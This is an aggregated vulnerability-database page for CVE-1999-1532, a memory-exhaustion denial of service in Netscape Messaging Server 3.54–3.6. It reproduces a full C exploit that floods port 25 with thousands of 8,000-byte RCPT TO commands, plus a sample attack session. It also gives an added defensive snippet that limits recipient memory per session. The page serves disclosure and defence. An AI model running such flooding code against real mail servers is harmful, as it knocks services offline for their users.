CVE-1999-1532
CVSS 5.0
Published: 1999-10-29 00:00:00
Last revised: 2016-10-17 22:05:34

[Original] Netscape Messaging Server 3.54, 3.55, and 3.6 allows a remote attacker to cause a denial of service (memory exhaustion) via a series of long RCPT TO commands.


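[CNNVD] Netscape Messaging Server RCPT TO DoS vulnerability (CNNVD-199910-054)

        Netscape Messaging Server versions 3.54, 3.55 and 3.6 contain a DoS vulnerability. A remote attacker can cause a denial of service (memory exhaustion) through a series of long RCPT TO commands.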

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:netscape:messaging_server:3.6    Netscape Netscape Messaging Server 3.6
cpe:/a:netscape:messaging_server:3.55    Netscape Netscape Messaging Server 3.55
cpe:/a:netscape:messaging_server:3.54    Netscape Netscape Messaging Server 3.54

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1532
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1532
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199910-054
(Official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=94117465014255&w=2
(UNKNOWN)  BUGTRAQ  19991029 message:Netscape Messaging Server RCPT TO vul.
http://www.securityfocus.com/bid/748
(VENDOR_ADVISORY)  BID  748

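- Vulnerability information

Netscape Messaging Server RCPT TO DoS vulnerability
Medium risk  Input validation
1999-10-29 00:00:00 2006-10-06 00:00:00
Remote / Local
        Netscape Messaging Server versions 3.54, 3.55 and 3.6 contain a DoS vulnerability. A remote attacker can cause a denial of service (memory exhaustion) through a series of long RCPT TO commands.

- Advisories and patches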

        Netscape has stated a release date of December 1999 for Messaging Server 4.15, which will not include this vulnerability.
        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (19571)

Netscape Messaging Server 3.6/3.54/3.55 RCPT TO DoS Vulnerability (EDBID:19571)
multiple dos
1999-10-28 Verified
0 Nobuo Miwa
N/A [Click to download]
source: http://www.securityfocus.com/bid/748/info

Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service. 

/***************************************************************
 You can test "YOUR" Netscape Messaging Server 3.6SP2 for NT
 whether vulnerable for too much RCPT TO or not. 
                  by Nobuo Miwa, LAC Japan  28th Oct. 1999 
                  http://www.lac.co.jp/security/ 
****************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>      /* close() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */

#define    STR_HELO      "HELO rcpt2\n"
#define    STR_MAILFROM  "MAIL FROM:rcpt2\n"
#define    RCPT2_LENGTH  8000
#define    RCPT2_NUMBER  10000

int openSocket(struct sockaddr_in *si, char *hostIPaddr)
{
    int             port=25, sd, rt ;
    long            li ;
    struct hostent  *he;

    si->sin_addr.s_addr = inet_addr(hostIPaddr);
    si->sin_family      = AF_INET;
    si->sin_port        = htons (port);
    sd = socket (si->sin_family, SOCK_STREAM, 0);
    if (sd == -1) return (-1);

    rt = connect(sd,(struct sockaddr *)si,sizeof(struct sockaddr_in));
    if ( rt < 0 ) {
       close(sd);
       return(-1);
    }

    return(sd) ;
}

void sendRCPT2(int sd)
{
    char    rcptStr[RCPT2_LENGTH], tmpStr[RCPT2_LENGTH+80], strn[80];
    int     rt, i;

    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    recv( sd, tmpStr, sizeof(tmpStr), 0 );
    printf("%s",tmpStr);  

    printf("%s",STR_HELO);
    send( sd, STR_HELO, strlen(STR_HELO), 0 );
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv( sd, tmpStr, sizeof(tmpStr), 0 );
    if ( rt>0 ) printf("%s",tmpStr);

    printf("%s",STR_MAILFROM);
    send(sd, STR_MAILFROM, strlen(STR_MAILFROM), 0);
    memset( tmpStr, 0, sizeof(tmpStr) ) ;
    rt = recv(sd, tmpStr, sizeof(tmpStr), 0);
    if ( rt>0 ) printf("%s",tmpStr);

    strcpy( rcptStr, "RCPT TO: rcpt2@" ) ;
    while ( RCPT2_LENGTH-strlen(rcptStr)>10 )
        strcat( rcptStr, "aaaaaaaaaa") ;
    strcat( rcptStr, "\n" );
    for ( i=0 ; i<RCPT2_NUMBER ; i++ ) {
        printf("No.%d RCPT TO:rcpt2@aaa.. len %d\n",i,(int)strlen(rcptStr));
        send( sd, rcptStr, strlen(rcptStr), 0 );
        rt = recv( sd, tmpStr, sizeof(tmpStr)-1, 0 );
        strncpy( strn, tmpStr, 60 ) ;
        strn[60] = '\0' ;   /* strncpy does not terminate when the source is 60+ bytes */
        if ( rt>0 ) printf("%s \n",strn);
    }

    return;
}

int main (int argc, char *argv[])
{
    char                 hostIPaddr[80], *cc, *pfft;
    int                  sd = 0;
    struct sockaddr_in   si;

    printf("You can use ONLY for YOUR Messaging Server 3.6\n");
    if (argc != 2) {
        printf("Usage: %s IPaddress \n",argv[0]);
        exit(1);
    } else
        strcpy (hostIPaddr, argv[1]);

    sd = openSocket(&si,hostIPaddr);  

    if (sd < 1) {
        printf("failed!\n");
        exit(-1);
    }

    sendRCPT2( sd );
    close (sd);

    exit(0);
}

- Vulnerability information

13555
Netscape Messaging Server RCPT TO Command Saturation DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

- Timeline

1999-10-29 Unknown
1999-10-29 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Netscape Messaging Server RCPT TO DoS Vulnerability
Input Validation Error 748
Yes Yes
1999-10-29 12:00:00 2009-07-11 12:56:00
Posted to Bugtraq October 29 by Nobuo Miwa <n-miwa@lac.co.jp>.

- Affected program versions

Netscape Messaging Server 3.55
Netscape Messaging Server 3.54
Netscape Messaging Server 3.6

- Vulnerability discussion

Netscape Messaging server will not de-allocate memory that is used to store the RCPT TO information for an incoming email. By sending enough long RCPT TO addresses, the system can be forced to consume all available memory, leading to a denial of service.
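One way a server can bound the memory that RCPT TO handling holds per session, as an added example (not code from the advisory, the exploit author or Netscape). All names are hypothetical; the limits are the ones given in RFC 5321 section 4.5.3.1, and the sample address is constructed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>

#define MAX_CMD_LINE 512   /* RFC 5321 4.5.3.1.4: command line, CRLF included */
#define MAX_PATH_LEN 256   /* RFC 5321 4.5.3.1.3: forward-path */
#define MAX_RCPTS    100   /* RFC 5321 4.5.3.1.8: minimum a server must accept */

struct smtp_session {
    char  *rcpt[MAX_RCPTS];
    size_t nrcpt;
    size_t bytes;          /* heap bytes currently held for recipients */
};

/* Release every stored recipient: call on RSET, after DATA, and on disconnect. */
void session_reset(struct smtp_session *s)
{
    for (size_t i = 0; i < s->nrcpt; i++) free(s->rcpt[i]);
    s->nrcpt = 0; s->bytes = 0;
}

/* Handle one "RCPT TO:<path>" line and return the SMTP reply code. */
int session_rcpt(struct smtp_session *s, const char *line)
{
    size_t len = strlen(line);
    if (len > MAX_CMD_LINE) return 500;                  /* line too long */
    if (strncasecmp(line, "RCPT TO:", 8) != 0) return 500;
    const char *path = line + 8;
    while (*path == ' ') path++;
    size_t plen = strcspn(path, "\r\n");
    if (plen == 0 || plen > MAX_PATH_LEN) return 501;    /* empty or over-long path */
    if (s->nrcpt >= MAX_RCPTS) return 452;               /* too many recipients */
    char *copy = malloc(plen + 1);
    if (copy == NULL) return 452;                        /* insufficient storage */
    memcpy(copy, path, plen);
    copy[plen] = '\0';
    s->rcpt[s->nrcpt++] = copy;
    s->bytes += plen + 1;
    return 250;
}

int main(void)
{
    struct smtp_session s = {0};
    int r = session_rcpt(&s, "RCPT TO:<user@example.test>\r\n"); /* constructed input */
    printf("reply %d, %zu recipient(s), %zu bytes held\n", r, s.nrcpt, s.bytes);
    session_reset(&s);
    return 0;
}
```

With these limits a single session can hold at most 100 x 257 bytes of recipient data, and that memory is returned as soon as the transaction ends.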

- Exploit

Example and exploit by Nobuo Miwa <n-miwa@lac.co.jp>

220 victim.workgroup ESMTP server (Netscape Messaging Server -
Version 3.62) ready Thu, 28 Oct 1999 12:13:17 +0900
helo rcpt2
250 victim.workgroup
mail from : rcpt2
250 Sender <rcpt2> Ok
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....
rcpt to: rcpt2@aaaaaaaaaaaaa............. 8000 bytes
250 Recipient <rcpt2@aaaaaaaaaaaa....

Repeat until DoS

- Solution

Netscape has stated a release date of December 1999 for Messaging Server 4.15, which will not include this vulnerability.

Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

     

     
